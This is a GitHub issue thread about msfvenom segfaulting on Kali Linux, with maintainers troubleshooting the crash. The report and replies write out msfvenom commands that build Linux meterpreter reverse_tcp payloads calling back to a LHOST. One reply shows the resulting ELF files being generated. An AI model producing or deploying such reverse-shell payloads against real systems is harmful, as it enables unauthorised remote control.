### ISSUE TITLE
"Segmentation fault" 

### ISSUE THREAD

**Issue by dudumao520** [rapid7/metasploit-framework#12265]
**METASPLOIT 5.0.43-DEV**

root@kali:~# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
root@kali:~#
----------------------------------------------------------------------------------------------------------
root@kali:~# msfvenom --list archs

Framework Architectures [--arch <value>]
========================================

    Name
    ----
    aarch64
    armbe
    armle
    cbea
    cbea64
    cmd
    dalvik
    firefox
    java
    mips
    mips64
    mips64le
    mipsbe
    mipsle
    nodejs
    php
    ppc
    ppc64
    ppc64le
    ppce500v2
    python
    r
    ruby
    sparc
    sparc64
    tty
    x64
    x86
    x86_64
    zarch
----------------------------------------------------------------------------------------------------------
when i run "msfvenom -a x86_64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9977 -f elf -o shell.elf" ，it prompt does not support this architecture. if i run "msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9977 -f elf -o shell.elf" or "msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9977 -f elf -o shell.elf" ,   it Will report an error "Segmentation fault" 

Thanks to the metasploit team！

**Comment by bcoles** [comment]
Do you have multiple versions of Metasploit installed?

`msfvenom` does not segfault on my system.

```
root@kali-2018:~/Desktop/metasploit-framework# ./msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9977 -f elf -o shell.elf 
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: shell.elf
root@kali-2018:~/Desktop/metasploit-framework# file shell.elf 
shell.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header
```

```
root@kali-2018:~/Desktop/metasploit-framework# ./msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9977 -f elf -o shell.elf
No encoder or badchars specified, outputting raw payload
Payload size: 129 bytes
Final size of elf file: 249 bytes
Saved as: shell.elf
root@kali-2018:~/Desktop/metasploit-framework# file shell.elf 
shell.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```

**Comment by dudumao520** [comment]
> multiple versions

I installed kail linux and update the metasploit,now the version is 5.0.43-dev

**Comment by busterb** [comment]
There's not a lot we can do to fix a segfault starting Metasploit from this project's PoV, since this is something that would happen in the Ruby interpreter or other system libraries that are supplied in Kali Linux directly. You might verify that you have sufficient ram allocated to your system. If the problem persists and others have the same issue I might suggest checking out Kali's support forums for help. Thanks!
